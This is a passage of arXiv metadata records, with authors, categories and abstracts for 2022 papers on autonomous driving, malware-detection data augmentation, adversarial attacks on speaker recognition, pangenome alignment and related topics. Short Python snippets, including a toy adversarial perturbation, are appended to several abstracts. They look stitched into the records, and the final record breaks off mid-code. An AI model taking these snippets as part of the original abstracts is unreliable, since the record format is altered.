\url{https://github.com/BonedDeng/TadML}.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 04:07:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Deng",
"Bowen",
""
],
[
"Liu",
"Dongchang",
""
]
] |
new_dataset
| 0.997707 |
2206.03004
|
Eric Wolff
|
Tung Phan-Minh and Forbes Howington and Ting-Sheng Chu and Sang Uk Lee
and Momchil S. Tomov and Nanxiang Li and Caglayan Dicle and Samuel Findler
and Francisco Suarez-Ruiz and Robert Beaudoin and Bo Yang and Sammy Omari and
Eric M. Wolff
|
Driving in Real Life with Inverse Reinforcement Learning
| null | null | null | null |
cs.RO cs.AI cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we introduce the first learning-based planner to drive a car
in dense, urban traffic using Inverse Reinforcement Learning (IRL). Our
planner, DriveIRL, generates a diverse set of trajectory proposals, filters
these trajectories with a lightweight and interpretable safety filter, and then
uses a learned model to score each remaining trajectory. The best trajectory is
then tracked by the low-level controller of our self-driving vehicle. We train
our trajectory scoring model on a 500+ hour real-world dataset of expert
driving demonstrations in Las Vegas within the maximum entropy IRL framework.
DriveIRL's benefits include: a simple design due to only learning the
trajectory scoring function, relatively interpretable features, and strong
real-world performance. We validated DriveIRL on the Las Vegas Strip and
demonstrated fully autonomous driving in heavy traffic, including scenarios
involving cut-ins, abrupt braking by the lead vehicle, and hotel pickup/dropoff
zones. Our dataset will be made public to help further research in this area.
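The propose-filter-score loop can be summarized in a few lines; everything below (the proposal distribution, the safety rule, the score weights) is a stand-in for the paper's learned and engineered components.

```python
import numpy as np

rng = np.random.default_rng(0)

def propose(n=50, horizon=20):
    # each proposal: (horizon, 2) positions from integrated random steps
    return rng.normal(0.0, 0.5, size=(n, horizon, 2)).cumsum(axis=1)

def is_safe(traj, v_max=2.0):
    # lightweight, interpretable rule: per-step displacement bound
    return np.linalg.norm(np.diff(traj, axis=0), axis=1).max() <= v_max

def score(traj):
    progress = traj[-1, 0]                           # forward progress
    jerk = np.abs(np.diff(traj, n=2, axis=0)).sum()  # comfort proxy
    return 1.0 * progress - 0.1 * jerk               # stand-in for IRL score

candidates = [t for t in propose() if is_safe(t)]
best = max(candidates, key=score)
print("chosen trajectory endpoint:", best[-1])
```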
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 04:36:46 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Phan-Minh",
"Tung",
""
],
[
"Howington",
"Forbes",
""
],
[
"Chu",
"Ting-Sheng",
""
],
[
"Lee",
"Sang Uk",
""
],
[
"Tomov",
"Momchil S.",
""
],
[
"Li",
"Nanxiang",
""
],
[
"Dicle",
"Caglayan",
""
],
[
"Findler",
"Samuel",
""
],
[
"Suarez-Ruiz",
"Francisco",
""
],
[
"Beaudoin",
"Robert",
""
],
[
"Yang",
"Bo",
""
],
[
"Omari",
"Sammy",
""
],
[
"Wolff",
"Eric M.",
""
]
] |
new_dataset
| 0.999423 |
2206.03018
|
Lik Hang Lee Dr.
|
Lik-Hang Lee, Pengyuan Zhou, Tristan Braud, Pan Hui
|
What is the Metaverse? An Immersive Cyberspace and Open Challenges
|
7 pages, 2 figures
| null | null | null |
cs.MM cs.CY
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
The Metaverse refers to a virtual-physical blended space in which multiple
users can concurrently interact with a unified computer-generated environment
and other users, which can be regarded as the next significant milestone of the
current cyberspace. This article primarily discusses the development and
challenges of the Metaverse. We first briefly describe the development of
cyberspace and the necessity of technology enablers. Accordingly, our bottom-up
approach highlights three critical technology enablers for the Metaverse:
networks, systems, and users. We also highlight a number of indispensable
issues, from technological and ecosystem perspectives, involved in building and
sustaining the Metaverse.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 05:22:42 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Lee",
"Lik-Hang",
""
],
[
"Zhou",
"Pengyuan",
""
],
[
"Braud",
"Tristan",
""
],
[
"Hui",
"Pan",
""
]
] |
new_dataset
| 0.958212 |
2206.03032
|
Zhiyao Xie
|
Zhiyao Xie
|
Intelligent Circuit Design and Implementation with Machine Learning
|
Ph.D. Dissertation, 2022. Due to the limitation "The abstract field
cannot be longer than 1,920 characters", the abstract here is shorter than
that in the PDF file
| null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The stagnation of EDA technologies stems from insufficient knowledge reuse.
In practice, very similar simulation or optimization results may need to be
repeatedly constructed from scratch. This motivates my research on introducing
more 'intelligence' to EDA with machine learning (ML), which explores complex
correlations in design flows based on prior data. Besides design time, I also
propose ML solutions to boost IC performance by assisting the circuit
management at runtime. In this dissertation, I present multiple fast yet
accurate ML models covering a wide range of chip design stages from the
register-transfer level (RTL) to sign-off, solving primary chip-design problems
about power, timing, interconnect, IR drop, routability, and design flow
tuning. Targeting the RTL stage, I present APOLLO, a fully automated power
modeling framework. It constructs an accurate per-cycle power model by
extracting the most power-correlated signals. The model can be further
implemented on chip for runtime power management with unprecedented low
hardware costs. Targeting gate-level netlist, I present Net2 for early
estimations on post-placement wirelength. It further enables more accurate
timing analysis without actual physical design information. Targeting circuit
layout, I present RouteNet for early routability prediction. As the first deep
learning-based routability estimator, some feature-extraction and model-design
principles proposed in it are widely adopted by later works. I also present
PowerNet for fast IR drop estimation. It captures spatial and temporal
information about power distribution with a customized CNN architecture. Last,
besides targeting a single design step, I present FIST to efficiently tune
design flow parameters during both logic synthesis and physical design.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 06:17:52 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Xie",
"Zhiyao",
""
]
] |
new_dataset
| 0.967922 |
2206.03047
|
Benoit Rittaud
|
Benoît Rittaud (LAGA)
|
Fibonacci-like sequences for variants of the tower of Hanoi, and
corresponding graphs and gray codes
| null | null | null | null |
cs.DM math.CO math.NT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We modify the rules of the classical Tower of Hanoi puzzle in a quite natural
way to get the Fibonacci sequence involved in the optimal algorithm of
resolution, and show some nice properties of such a variant. In particular, we
deduce from this Tower of Hanoi-Fibonacci a Gray-like code on the set of binary
words without the factor 11, which has some properties interesting in
themselves and from which an iterative algorithm for the Tower of
Hanoi-Fibonacci is obtained. Such an algorithm involves the Fibonacci
substitution. Finally, we briefly extend the study to some natural
generalizations.
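The combinatorial object behind the Gray-like code, binary words avoiding the factor 11, is easy to enumerate, and counting them recovers the Fibonacci numbers; a short self-contained check (not the paper's iterative algorithm):

```python
def words_no_11(n):
    """All binary words of length n with no factor 11."""
    if n == 0:
        return [""]
    if n == 1:
        return ["0", "1"]
    # a valid word ends in '0' (any valid prefix) or in '01'
    return ([w + "0" for w in words_no_11(n - 1)]
            + [w + "01" for w in words_no_11(n - 2)])

print([len(words_no_11(n)) for n in range(1, 10)])
# [2, 3, 5, 8, 13, 21, 34, 55, 89] -- consecutive Fibonacci numbers
```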
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 06:42:22 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Rittaud",
"Benoît",
"",
"LAGA"
]
] |
new_dataset
| 0.993316 |
2206.03139
|
Chen Yan
|
Chen Yan, Federico Carnevale, Petko Georgiev, Adam Santoro, Aurelia
Guy, Alistair Muldal, Chia-Chun Hung, Josh Abramson, Timothy Lillicrap,
Gregory Wayne
|
Intra-agent speech permits zero-shot task acquisition
| null | null | null | null |
cs.LG cs.AI cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Human language learners are exposed to a trickle of informative,
context-sensitive language, but a flood of raw sensory data. Through both
social language use and internal processes of rehearsal and practice, language
learners are able to build high-level, semantic representations that explain
their perceptions. Here, we take inspiration from such processes of "inner
speech" in humans (Vygotsky, 1934) to better understand the role of intra-agent
speech in embodied behavior. First, we formally pose intra-agent speech as a
semi-supervised problem and develop two algorithms that enable visually
grounded captioning with little labeled language data. We then experimentally
compute scaling curves over different amounts of labeled data and compare the
data efficiency against a supervised learning baseline. Finally, we incorporate
intra-agent speech into an embodied, mobile manipulator agent operating in a 3D
virtual world, and show that with as few as 150 additional image captions,
intra-agent speech endows the agent with the ability to manipulate and answer
questions about a new object without any related task-directed experience
(zero-shot). Taken together, our experiments suggest that modelling intra-agent
speech is effective in enabling embodied agents to learn new tasks efficiently
and without direct interaction experience.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 09:28:10 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Yan",
"Chen",
""
],
[
"Carnevale",
"Federico",
""
],
[
"Georgiev",
"Petko",
""
],
[
"Santoro",
"Adam",
""
],
[
"Guy",
"Aurelia",
""
],
[
"Muldal",
"Alistair",
""
],
[
"Hung",
"Chia-Chun",
""
],
[
"Abramson",
"Josh",
""
],
[
"Lillicrap",
"Timothy",
""
],
[
"Wayne",
"Gregory",
""
]
] |
new_dataset
| 0.996183 |
2206.03190
|
Minho Oh
|
Minho Oh, Euigon Jung, Hyungtae Lim, Wonho Song, Sumin Hu, Eungchang
Mason Lee, Junghee Park, Jaekyung Kim, Jangwoo Lee, and Hyun Myung
|
TRAVEL: Traversable Ground and Above-Ground Object Segmentation Using
Graph Representation of 3D LiDAR Scans
|
RA-L accepted
| null | null | null |
cs.RO
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Perception of traversable regions and objects of interest from a 3D point
cloud is one of the critical tasks in autonomous navigation. A ground vehicle
needs to look for traversable terrains that are explorable by wheels. Then, to
make safe navigation decisions, the segmentation of objects positioned on those
terrains has to be followed up. However, over-segmentation and
under-segmentation can negatively influence such navigation decisions. To that
end, we propose TRAVEL, which performs traversable ground detection and object
clustering simultaneously using the graph representation of a 3D point cloud.
To segment the traversable ground, a point cloud is encoded into a graph
structure, tri-grid field, which treats each tri-grid as a node. Then, the
traversable regions are searched and redefined by examining local convexity and
concavity of edges that connect nodes. On the other hand, our above-ground
object segmentation employs a graph structure by representing a group of
horizontally neighboring 3D points in a spherical-projection space as a node
and vertical/horizontal relationship between nodes as an edge. Fully leveraging
the node-edge structure, the above-ground segmentation ensures real-time
operation and mitigates over-segmentation. Through experiments using
simulations, urban scenes, and our own datasets, we have demonstrated that our
proposed traversable ground segmentation algorithm outperforms other
state-of-the-art methods in terms of the conventional metrics and that our
newly proposed evaluation metrics are meaningful for assessing the above-ground
segmentation. We will make the code and our own dataset available to public at
https://github.com/url-kaist/TRAVEL.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 11:24:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Oh",
"Minho",
""
],
[
"Jung",
"Euigon",
""
],
[
"Lim",
"Hyungtae",
""
],
[
"Song",
"Wonho",
""
],
[
"Hu",
"Sumin",
""
],
[
"Lee",
"Eungchang Mason",
""
],
[
"Park",
"Junghee",
""
],
[
"Kim",
"Jaekyung",
""
],
[
"Lee",
"Jangwoo",
""
],
[
"Myung",
"Hyun",
""
]
] |
new_dataset
| 0.964783 |
2206.03215
|
Fabio Lobato
|
Fábio Manoel França Lobato
|
Proteção intelectual de obras produzidas por sistemas baseados em
inteligência artificial: uma visão tecnicista sobre o tema
|
In Portuguese. Text published by the Instituto Observatório de Direito
Autoral, available at:
https://ioda.org.br/protecao-intelectual-de-obras-produzidas-por-sistemas-baseados-em-inteligencia-artificial-uma-visao-tecnicista-sobre-o-tema/
| null | null | null |
cs.CY
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The pervasiveness of Artificial Intelligence (AI) is unquestionable in our
society. Even in the arts, AI is present. A notorious case is the song "Hey
Ya!" by the OutKast group, a hit in the 2000s. At that time, the music
industry began making data-driven decisions, strategizing based on
predictions of listeners' habits. This case is just one of the countless
examples of AI applications in the arts. The advent of deep learning made it
possible to build systems capable of accurately recognizing artistic style in
paintings. Content generation is also possible; for example, Deepart customizes
images from two \textit{inputs}: 1) an image to be customized; 2) a style of
painting. The generation of songs according to specific styles from AI-based
systems is also possible. Such possibilities raise questions about the
intellectual property of such works. In this setting, who owns the copyright
of a work produced by a system based on Artificial Intelligence? The
creator of the AI? The company/corporation that subsidized the development of
this system? Or AI itself as a creator? This essay aims to contribute with a
technicist view on the discussion of copyright applicability from works
produced by AI.
|
[
{
"version": "v1",
"created": "Wed, 11 May 2022 12:07:47 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Lobato",
"Fábio Manoel França",
""
]
] |
new_dataset
| 0.982067 |
2206.03227
|
Shadrokh Samavi
|
Altanai Bisht, Arielle Wilson, Zachary Jeffreys, Shadrokh Samavi
|
Does Crypto Kill? Relationship between Electricity Consumption Carbon
Footprints and Bitcoin Transactions
|
8 pages, 17 figures
| null | null | null |
cs.CY cs.CR cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
Cryptocurrencies are gaining more popularity due to their security, making
counterfeits impossible. However, these digital currencies have been criticized
for creating a large carbon footprint due to their algorithmic complexity and
decentralized system design for proof of work and mining. We hypothesize that
the carbon footprint of cryptocurrency transactions depends more heavily on
carbon-rich fuel sources than on green or renewable fuel sources. We provide a
machine learning framework to model such transactions and correlate them with
the electricity generation patterns to estimate and analyze their carbon cost.
|
[
{
"version": "v1",
"created": "Mon, 16 May 2022 18:03:45 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Bisht",
"Altanai",
""
],
[
"Wilson",
"Arielle",
""
],
[
"Jeffreys",
"Zachary",
""
],
[
"Samavi",
"Shadrokh",
""
]
] |
new_dataset
| 0.957817 |
2206.03242
|
Moses Njagi Mwaniki
|
Njagi Moses Mwaniki and Erik Garrison and Nadia Pisanti
|
Fast Exact String to D-Texts Alignments
| null | null | null | null |
cs.DS q-bio.GN
|
http://creativecommons.org/licenses/by/4.0/
|
In recent years, aligning a sequence to a pangenome has become a central
problem in genomics and pangenomics. A fast and accurate solution to this
problem can serve as a toolkit to many crucial tasks such as read-correction,
Multiple Sequence Alignment (MSA), genome assemblies, variant calling, just to
name a few. In this paper we propose a new, fast and exact method to align a
string to a D-string, the latter possibly representing an MSA, a pan-genome or
a partial assembly. An implementation of our tool dsa is publicly available at
https://github.com/urbanslug/dsa
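As a baseline for what "string to D-string alignment" means, a quadratic dynamic program where each degenerate position is a set of allowed letters and a character matches if it belongs to the set; the paper's contribution is a fast exact method, which this sketch does not reproduce.

```python
def align(s, dstring):
    """Edit distance between string s and a D-string given as a list of
    sets of allowed letters (match cost 0 if the letter is in the set)."""
    n, m = len(s), len(dstring)
    D = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        D[i][0] = i
    for j in range(m + 1):
        D[0][j] = j
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            sub = 0 if s[i - 1] in dstring[j - 1] else 1
            D[i][j] = min(D[i - 1][j] + 1,        # deletion
                          D[i][j - 1] + 1,        # insertion
                          D[i - 1][j - 1] + sub)  # (mis)match
    return D[n][m]

print(align("ACT", [{"A"}, {"C", "G"}, {"T"}]))  # 0: matches via the set
print(align("AGT", [{"A"}, {"C"}, {"T"}]))       # 1: one substitution
```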
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 12:56:56 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Mwaniki",
"Njagi Moses",
""
],
[
"Garrison",
"Erik",
""
],
[
"Pisanti",
"Nadia",
""
]
] |
new_dataset
| 0.987847 |
2206.03259
|
Alexandru Iosup
|
Alexandru Iosup (VU University Amsterdam), Fernando Kuipers (Delft
University of Technology), Ana Lucia Varbanescu (University of Twente), Paola
Grosso (University of Amsterdam), Animesh Trivedi (VU University Amsterdam),
Jan Rellermeyer (Delft University of Technology), Lin Wang (VU University
Amsterdam), Alexandru Uta (University of Leiden), Francesco Regazzoni
(University of Amsterdam)
|
Future Computer Systems and Networking Research in the Netherlands: A
Manifesto
|
Position paper: 7 foundational research themes in computer science
and networking research, 4 advances with outstanding impact on society, 10
recommendations, 50 pages. Co-signatories from (alphabetical order): ASTRON,
CWI, Gaia-X NL, NIKHEF, RU Groningen, SIDN Labs, Solvinity, SURF, TNO, TU/e,
TU Delft, UvA, U. Leiden, U. Twente, VU Amsterdam
| null | null | null |
cs.CY
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Our modern society and competitive economy depend on a strong digital
foundation and, in turn, on sustained research and innovation in computer
systems and networks (CompSys). With this manifesto, we draw attention to
CompSys as a vital part of ICT. Among ICT technologies, CompSys covers all the
hardware and all the operational software layers that enable applications; only
application-specific details, and often only application-specific algorithms,
are not part of CompSys. Each of the Top Sectors of the Dutch Economy, each
route in the National Research Agenda, and each of the UN Sustainable
Development Goals pose challenges that cannot be addressed without
groundbreaking CompSys advances. Looking at the 2030-2035 horizon, important
new applications will emerge only when enabled by CompSys developments.
Triggered by the COVID-19 pandemic, millions moved abruptly online, raising
infrastructure scalability and data sovereignty issues; but governments
processing social data and responsible social networks still require a paradigm
shift in data sovereignty and sharing. AI already requires massive computer
systems which can cost millions per training task, but the current technology
leaves an unsustainable energy footprint including large carbon emissions.
Computational sciences such as bioinformatics, and "Humanities for all" and
"citizen data science", cannot become affordable and efficient until computer
systems take a generational leap. Similarly, the emerging quantum internet
depends on (traditional) CompSys to bootstrap operation for the foreseeable
future. Large commercial sectors, including finance and manufacturing, require
specialized computing and networking or risk becoming uncompetitive. And, at
the core of Dutch innovation, promising technology hubs, deltas, ports, and
smart cities, could see their promise stagger due to critical dependency on
non-European technology.
|
[
{
"version": "v1",
"created": "Thu, 26 May 2022 11:02:29 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Iosup",
"Alexandru",
"",
"VU University Amsterdam"
],
[
"Kuipers",
"Fernando",
"",
"Delft\n University of Technology"
],
[
"Varbanescu",
"Ana Lucia",
"",
"University of Twente"
],
[
"Grosso",
"Paola",
"",
"University of Amsterdam"
],
[
"Trivedi",
"Animesh",
"",
"VU University Amsterdam"
],
[
"Rellermeyer",
"Jan",
"",
"Delft University of Technology"
],
[
"Wang",
"Lin",
"",
"VU University\n Amsterdam"
],
[
"Uta",
"Alexandru",
"",
"University of Leiden"
],
[
"Regazzoni",
"Francesco",
"",
"University of Amsterdam"
]
] |
new_dataset
| 0.99919 |
2206.03265
|
Michael Wong
|
Michael D. Wong, Edward Raff, James Holt, Ravi Netravali
|
Marvolo: Programmatic Data Augmentation for Practical ML-Driven Malware
Detection
|
15 pages, 7 figures
| null | null | null |
cs.CR cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
Data augmentation has been rare in the cyber security domain due to technical
difficulties in altering data in a manner that is semantically consistent with
the original data. This shortfall is particularly onerous given the unique
difficulty of acquiring benign and malicious training data that runs into
copyright restrictions, and that institutions like banks and governments
receive targeted malware that will never exist in large quantities. We present
MARVOLO, a binary mutator that programmatically grows malware (and benign)
datasets in a manner that boosts the accuracy of ML-driven malware detectors.
MARVOLO employs semantics-preserving code transformations that mimic the
alterations that malware authors and defensive benign developers routinely make
in practice, allowing us to generate meaningful augmented data. Crucially,
semantics-preserving transformations also enable MARVOLO to safely propagate
labels from original to newly-generated data samples without mandating
expensive reverse engineering of binaries. Further, MARVOLO embeds several key
optimizations that keep costs low for practitioners by maximizing the density
of diverse data samples generated within a given time (or resource) budget.
Experiments using wide-ranging commercial malware datasets and a recent
ML-driven malware detector show that MARVOLO boosts accuracies by up to 5%,
while operating on only a small fraction (15%) of the potential input binaries.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 13:18:31 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Wong",
"Michael D.",
""
],
[
"Raff",
"Edward",
""
],
[
"Holt",
"James",
""
],
[
"Netravali",
"Ravi",
""
]
] |
new_dataset
| 0.999749 |
2206.03274
|
Shiva Kazemi Taskou
|
Shiva Kazemi Taskou, Mehdi Rasti, and Pedro H. J. Nardelli
|
Minimizing Energy Consumption for End-to-End Slicing in 5G Wireless
Networks and Beyond
|
6 pages, Published in WCNC 2022
| null |
10.1109/WCNC51071.2022.9771610
| null |
cs.NI
|
http://creativecommons.org/publicdomain/zero/1.0/
|
End-to-End (E2E) network slicing enables wireless networks to provide diverse
services on a common infrastructure. Each E2E slice, including resources of
radio access network (RAN) and core network, is rented to mobile virtual
network operators (MVNOs) to provide a specific service to end-users. RAN
slicing, which is realized through wireless network virtualization, involves
sharing the frequency spectrum and base station antennas in RAN. Similarly, in
core slicing, which is achieved by network function virtualization, data center
resources such as commodity servers and physical links are shared between users
of different MVNOs. In this paper, we study E2E slicing with the aim of
minimizing the total energy consumption. The stated optimization problem is
non-convex and is solved by a sub-optimal algorithm proposed here. The
simulation results show that our proposed joint power control, server and link
allocation (JPSLA) algorithm achieves 30% improvement compared to the disjoint
scheme, where RAN and core are sliced separately.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 13:24:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Taskou",
"Shiva Kazemi",
""
],
[
"Rasti",
"Mehdi",
""
],
[
"Nardelli",
"Pedro H. J.",
""
]
] |
new_dataset
| 0.988698 |
2206.03312
|
Arthur Juliani
|
Arthur Juliani, Samuel Barnett, Brandon Davis, Margaret Sereno, Ida
Momennejad
|
Neuro-Nav: A Library for Neurally-Plausible Reinforcement Learning
| null | null | null | null |
cs.NE cs.AI cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this work we propose Neuro-Nav, an open-source library for neurally
plausible reinforcement learning (RL). RL is among the most common modeling
frameworks for studying decision making, learning, and navigation in biological
organisms. In utilizing RL, cognitive scientists often handcraft environments
and agents to meet the needs of their particular studies. On the other hand,
artificial intelligence researchers often struggle to find benchmarks for
neurally and biologically plausible representation and behavior (e.g., in
decision making or navigation). In order to streamline this process across both
fields with transparency and reproducibility, Neuro-Nav offers a set of
standardized environments and RL algorithms drawn from canonical behavioral and
neural studies in rodents and humans. We demonstrate that the toolkit
replicates relevant findings from a number of studies across both cognitive
science and RL literatures. We furthermore describe ways in which the library
can be extended with novel algorithms (including deep RL) and environments to
address future research needs of the field.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 16:33:36 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Juliani",
"Arthur",
""
],
[
"Barnett",
"Samuel",
""
],
[
"Davis",
"Brandon",
""
],
[
"Sereno",
"Margaret",
""
],
[
"Momennejad",
"Ida",
""
]
] |
new_dataset
| 0.983712 |
2206.03351
|
Fu Song
|
Guangke Chen and Zhe Zhao and Fu Song and Sen Chen and Lingling Fan
and Yang Liu
|
AS2T: Arbitrary Source-To-Target Adversarial Attack on Speaker
Recognition Systems
| null | null | null | null |
cs.SD cs.CR cs.LG eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Recent work has illuminated the vulnerability of speaker recognition systems
(SRSs) against adversarial attacks, raising significant security concerns in
deploying SRSs. However, they considered only a few settings (e.g., some
combinations of source and target speakers), leaving many interesting and
important real-world attack settings unexplored. In this work, we
present AS2T, the first attack in this domain that covers all the settings,
thus allowing the adversary to craft adversarial voices using arbitrary source
and target speakers for any of three main recognition tasks. Since none of the
existing loss functions can be applied to all the settings, we explore many
candidate loss functions for each setting including the existing and newly
designed ones. We thoroughly evaluate their efficacy and find that some
existing loss functions are suboptimal. Then, to improve the robustness of AS2T
towards practical over-the-air attacks, we study the possible distortions
that occur in over-the-air transmission, utilize different transformation
functions with different parameters to model those distortions, and incorporate
them into the generation of adversarial voices. Our simulated over-the-air
evaluation validates the effectiveness of our solution in producing robust
adversarial voices which remain effective under various hardware devices and
various acoustic environments with different reverberation, ambient noises, and
noise levels. Finally, we leverage AS2T to perform thus far the largest-scale
evaluation to understand transferability among 14 diverse SRSs. The
transferability analysis provides many interesting and useful insights which
challenge several findings and conclusions drawn in previous works in the image
domain. Our study also sheds light on future directions of adversarial attacks
in the speaker recognition domain.
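As background, a one-step FGSM-style targeted perturbation on a toy differentiable "speaker classifier"; AS2T's setting-specific loss functions and over-the-air transformations go well beyond this sketch, and the model here is a random stand-in.

```python
import torch

torch.manual_seed(0)
model = torch.nn.Linear(16000, 10)                 # toy SRS over 10 speakers
waveform = torch.randn(1, 16000, requires_grad=True)
target = torch.tensor([3])                         # desired target speaker

# descend the loss toward the target class (targeted FGSM step)
loss = torch.nn.functional.cross_entropy(model(waveform), target)
loss.backward()

epsilon = 2e-3                                     # perturbation budget
adversarial = (waveform - epsilon * waveform.grad.sign()).detach()
print("prediction on perturbed audio:", model(adversarial).argmax(dim=1).item())
```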
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 14:38:55 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Chen",
"Guangke",
""
],
[
"Zhao",
"Zhe",
""
],
[
"Song",
"Fu",
""
],
[
"Chen",
"Sen",
""
],
[
"Fan",
"Lingling",
""
],
[
"Liu",
"Yang",
""
]
] |
new_dataset
| 0.997838 |
2206.03418
|
Ichiro Hasuo
|
Ichiro Hasuo
|
Responsibility-Sensitive Safety: an Introduction with an Eye to Logical
Foundations and Formalization
|
10 pages
| null | null | null |
cs.RO cs.LO
|
http://creativecommons.org/licenses/by/4.0/
|
Responsibility-sensitive safety (RSS) is an approach to the safety of
automated driving systems (ADS). It aims to introduce mathematically formulated
safety rules, compliance with which guarantees collision avoidance as a
mathematical theorem. However, despite the emphasis on mathematical and logical
guarantees, the logical foundations and formalization of RSS are largely an
unexplored topic of study. In this paper, we present an introduction to RSS,
one that we expect will bridge between different research communities and pave
the way to a logical theory of RSS, its mathematical formalization, and
software tools of practical use.
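The flavor of RSS's mathematically formulated rules can be seen in its safe longitudinal distance: with response time rho, maximum acceleration a_max, the rear car's minimum braking b_min, and the front car's maximum braking b_max, a rear car at speed v_r must keep at least d_min from a front car at speed v_f. A direct transcription of that rule as usually stated (parameter values below are arbitrary):

```python
def rss_safe_distance(v_r, v_f, rho=1.0, a_max=3.0, b_min=4.0, b_max=8.0):
    """Minimum safe longitudinal gap between a rear car at speed v_r and a
    front car at speed v_f (speeds in m/s, distances in metres)."""
    d = (v_r * rho
         + 0.5 * a_max * rho ** 2
         + (v_r + rho * a_max) ** 2 / (2 * b_min)
         - v_f ** 2 / (2 * b_max))
    return max(d, 0.0)

print(rss_safe_distance(v_r=20.0, v_f=15.0))  # ~73.6 m for these parameters
```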
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 16:07:42 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Hasuo",
"Ichiro",
""
]
] |
new_dataset
| 0.957167 |
2206.03469
|
Alice Moallemy-Oureh
|
Alice Moallemy-Oureh, Silvia Beddar-Wiesing, Rüdiger Nather,
Josephine M. Thomas
|
FDGNN: Fully Dynamic Graph Neural Network
| null | null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Dynamic Graph Neural Networks have recently become increasingly important, as
graphs from many scientific fields, ranging from mathematics, biology, social
sciences, and physics to computer science, are dynamic by nature. While
temporal changes (dynamics) play an essential role in many real-world
applications, most of the models in the literature on Graph Neural Networks
(GNN) process static graphs. The few GNN models on dynamic graphs only consider
exceptional cases of dynamics, e.g., node attribute-dynamic graphs or
structure-dynamic graphs limited to additions or changes to the graph's edges,
etc. Therefore, we present a novel Fully Dynamic Graph Neural Network (FDGNN)
that can handle fully-dynamic graphs in continuous time. The proposed method
provides a node and an edge embedding that includes their activity to address
added and deleted nodes or edges, and possible attributes. Furthermore, the
embeddings specify Temporal Point Processes for each event to encode the
distributions of the structure- and attribute-related incoming graph events. In
addition, our model can be updated efficiently by considering single events for
local retraining.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 17:40:51 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Moallemy-Oureh",
"Alice",
""
],
[
"Beddar-Wiesing",
"Silvia",
""
],
[
"Nather",
"Rüdiger",
""
],
[
"Thomas",
"Josephine M.",
""
]
] |
new_dataset
| 0.999304 |
1808.03830
|
Ioannis Kontoyiannis
|
Dimitris Cheliotis and Ioannis Kontoyiannis and Michail Loulakis and
Stavros Toumpis
|
A Simple Network of Nodes Moving on the Circle
|
Preliminary versions of some of the present results appeared in ISIT
2017 and SPAWC 2018
|
Random Structures & Algorithms 57 (2), 317-338 (2020)
|
10.1002/rsa.20932
| null |
cs.IT math.IT math.PR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Two simple Markov processes are examined, one in discrete and one in
continuous time, arising from idealized versions of a transmission protocol for
mobile, delay-tolerant networks. We consider two independent walkers moving
with constant speed on either the discrete or continuous circle, and changing
directions at independent geometric (respectively, exponential) times. One of
the walkers carries a message that wishes to travel as far and as fast as
possible in the clockwise direction. The message stays with its current carrier
unless the two walkers meet, the carrier is moving counter-clockwise, and the
other walker is moving clockwise. In that case, the message jumps to the other
walker. The long-term average clockwise speed of the message is computed. An
explicit expression is derived via the solution of an associated boundary value
problem in terms of the generator of the underlying Markov process. The average
transmission cost is also similarly computed, measured as the long-term number
of jumps the message makes per unit time. The tradeoff between speed and cost
is examined, as a function of the underlying problem parameters.
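The long-term average speed derived analytically in the paper can be checked by direct simulation of the continuous-time model; a discretized sketch (step size, horizon, and switching rate below are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(0)
lam, dt, T = 1.0, 1e-3, 500.0           # switching rate, step, horizon

pos = rng.uniform(0.0, 1.0, size=2)     # circle of circumference 1
direc = rng.choice([-1, 1], size=2)     # +1 clockwise, -1 counter-clockwise
carrier, travelled = 0, 0.0

for _ in range(int(T / dt)):
    direc[rng.random(2) < lam * dt] *= -1           # exponential clocks
    pos = (pos + direc * dt) % 1.0
    travelled += direc[carrier] * dt
    gap = abs((pos[0] - pos[1] + 0.5) % 1.0 - 0.5)  # circular distance
    other = 1 - carrier
    if gap < dt and direc[carrier] == -1 and direc[other] == 1:
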